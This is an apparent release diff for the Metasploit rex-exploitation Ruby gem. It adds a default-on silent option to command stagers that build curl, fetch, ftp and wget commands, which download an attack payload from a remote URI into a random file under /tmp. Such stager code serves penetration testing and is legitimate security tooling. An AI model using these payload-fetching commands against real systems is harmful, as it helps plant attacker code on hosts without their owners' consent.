rex-exploitation 0.1.37 → 0.1.38

Sign up to get free protection for your applications and to get access to all the features.
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: efae7e0ffa11f8cad37036f3db9ae9144cc1895a9e90111b585ad750f07ea822
4
- data.tar.gz: 3dfa6dc1ca737e7011efc806ed321edc3a44085f79fbfa47b483bdb863f729da
3
+ metadata.gz: dd288cd8a6368cbe9fdb09987c43eee0ea4345ba713c57e0b388c427a2faf100
4
+ data.tar.gz: 006413c195ac9266d5aeca6c2c03b73d5b0b0651bc3d9ad880d72dbde07cbf66
5
5
  SHA512:
6
- metadata.gz: a20d86a1cc4e33206805788655793535d138dd78c95d76d9d335364b66b57c2b75931e7ed28fe04bd65105067fd39c608b5d655c9ccf6396baff358bc6b263fa
7
- data.tar.gz: 072161c900ebda55d788513db71838b3f0510c48b5f1cd6fa9239e19db0bbe49c59e21b28843b03d8de58b8cb1eed8795edb3a77b7c06b216f1b1001168c1328
6
+ metadata.gz: 8ba577dd6c6821b2451cb6a4a04eeb698361cce945b12d2951e33ed48c730b0f44c7dbf1535971aff3bfa55b859104fc6e254029b72e128ffb583229be0486b9
7
+ data.tar.gz: 1725bb216555d54137b426e5c1564c785d4c49ad7b27223a1b6fd2511105aafa617e8bcb9d9a0d3ef1e056758745b13114018ac8e45781a3f8a08418a22af89f
checksums.yaml.gz.sig CHANGED
Binary file
@@ -17,6 +17,7 @@ class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
17
17
 
18
18
  opts[:temp] ||= '/tmp'
19
19
  opts[:file] ||= Rex::Text.rand_text_alpha(8)
20
+ opts[:silent] = true if opts[:silent].nil?
20
21
  @payload_path = "#{opts[:temp]}/#{opts[:file]}"
21
22
 
22
23
  super
@@ -25,12 +26,13 @@ class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
25
26
  def generate_cmds_payload(opts)
26
27
  cmds = []
27
28
  uri = opts[:payload_uri]
29
+ silent_flag = opts[:silent] ? 's' : ''
28
30
 
29
31
  if opts[:ssl]
30
- cmds << "curl -kso #{@payload_path} #{uri}"
32
+ cmds << "curl -#{silent_flag}ko #{@payload_path} #{uri}"
31
33
  else
32
34
  uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
33
- cmds << "curl -so #{@payload_path} #{uri}"
35
+ cmds << "curl -#{silent_flag}o #{@payload_path} #{uri}"
34
36
  end
35
37
 
36
38
  cmds
@@ -17,6 +17,7 @@ class Rex::Exploitation::CmdStagerFetch < Rex::Exploitation::CmdStagerBase
17
17
 
18
18
  opts[:temp] ||= '/tmp'
19
19
  opts[:file] ||= Rex::Text.rand_text_alpha(8)
20
+ opts[:silent] = true if opts[:silent].nil?
20
21
  @payload_path = "#{opts[:temp]}/#{opts[:file]}"
21
22
 
22
23
  super
@@ -26,10 +27,11 @@ class Rex::Exploitation::CmdStagerFetch < Rex::Exploitation::CmdStagerBase
26
27
  cmds = []
27
28
  nvp = '--no-verify-peer'
28
29
 
30
+ silent_flag = opts[:silent] ? 'q' : ''
29
31
  if opts[:ssl]
30
- cmds << "fetch -qo #{@payload_path} #{nvp} #{opts[:payload_uri]}"
32
+ cmds << "fetch -#{silent_flag}o #{@payload_path} #{nvp} #{opts[:payload_uri]}"
31
33
  else
32
- cmds << "fetch -qo #{@payload_path} #{opts[:payload_uri]}"
34
+ cmds << "fetch -#{silent_flag}o #{@payload_path} #{opts[:payload_uri]}"
33
35
  end
34
36
 
35
37
  cmds
@@ -17,14 +17,17 @@ class Rex::Exploitation::CmdStagerFtpHttp < Rex::Exploitation::CmdStagerBase
17
17
 
18
18
  opts[:temp] ||= '/tmp'
19
19
  opts[:file] ||= Rex::Text.rand_text_alpha(8)
20
+ opts[:silent] = true if opts[:silent].nil?
20
21
  @payload_path = "#{opts[:temp]}/#{opts[:file]}"
21
22
 
22
23
  super
23
24
  end
24
25
 
25
26
  def generate_cmds_payload(opts)
27
+ # -V: disable verbose output (quiet mode)
28
+ silent_flag = opts[:silent] ? 'V' : ''
26
29
  # -o: output file name (argument must be before URL)
27
- ["ftp -o #{@payload_path} #{opts[:payload_uri]}"]
30
+ ["ftp -#{silent_flag}o #{@payload_path} #{opts[:payload_uri]}"]
28
31
  end
29
32
 
30
33
  def generate_cmds_decoder(opts)
@@ -17,6 +17,7 @@ class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
17
17
 
18
18
  opts[:temp] ||= '/tmp'
19
19
  opts[:file] ||= Rex::Text.rand_text_alpha(8)
20
+ opts[:silent] = true if opts[:silent].nil?
20
21
  @payload_path = "#{opts[:temp]}/#{opts[:file]}"
21
22
 
22
23
  super
@@ -27,12 +28,13 @@ class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
27
28
 
28
29
  uri = opts[:payload_uri]
29
30
  ncc = '--no-check-certificate'
31
+ silent_flag = opts[:silent] ? 'q' : ''
30
32
 
31
33
  if opts[:ssl]
32
- cmds << "wget -qO #{@payload_path} #{ncc} #{uri}"
34
+ cmds << "wget -#{silent_flag}O #{@payload_path} #{ncc} #{uri}"
33
35
  else
34
36
  uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
35
- cmds << "wget -qO #{@payload_path} #{uri}"
37
+ cmds << "wget -#{silent_flag}O #{@payload_path} #{uri}"
36
38
  end
37
39
 
38
40
  cmds
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Exploitation
3
- VERSION = "0.1.37"
3
+ VERSION = "0.1.38"
4
4
  end
5
5
  end
data.tar.gz.sig CHANGED
Binary file
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: rex-exploitation
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.37
4
+ version: 0.1.38
5
5
  platform: ruby
6
6
  authors:
7
7
  - Metasploit Hackers
@@ -93,7 +93,7 @@ cert_chain:
93
93
  EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
94
94
  9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
95
95
  -----END CERTIFICATE-----
96
- date: 2023-01-31 00:00:00.000000000 Z
96
+ date: 2023-03-06 00:00:00.000000000 Z
97
97
  dependencies:
98
98
  - !ruby/object:Gem::Dependency
99
99
  name: rake
metadata.gz.sig CHANGED
@@ -1 +1 @@
1
- i��-��S��7g{�)>Qha^S_7��2S��J��PR���N���m���I݆j4i`�D�ly�˸�}���<P8rt枂�)��YxӬPI7��/À���q"��'����b���M؀H��&�!�xE>�/�,�X)��yכ� fq�C_F� ��M]Ѳ����$@��YQ�#5is1G�κ�3G��n^��H����] 賓,?_��n���6 [Qۋ0��=���BeTU��d�
1
+ e,A ��kJ|��N.I6��Gg��r��<B�,n��d�6���M��9Kf���3q�>_u�r�ĵC�}uj��otcC>���<�z`��S~�=J���֤`�(Jr���pM����;��� ��ީ�$b̤Ӳ�qZ���k�m/�hBG�N���b]��*�@���^��opQ�;��Nv!仮�AѺj���zQ�~Mc���?s�d��&���Fa�#_����p��p��8�X�ܹS^�XhY��e�ݤ,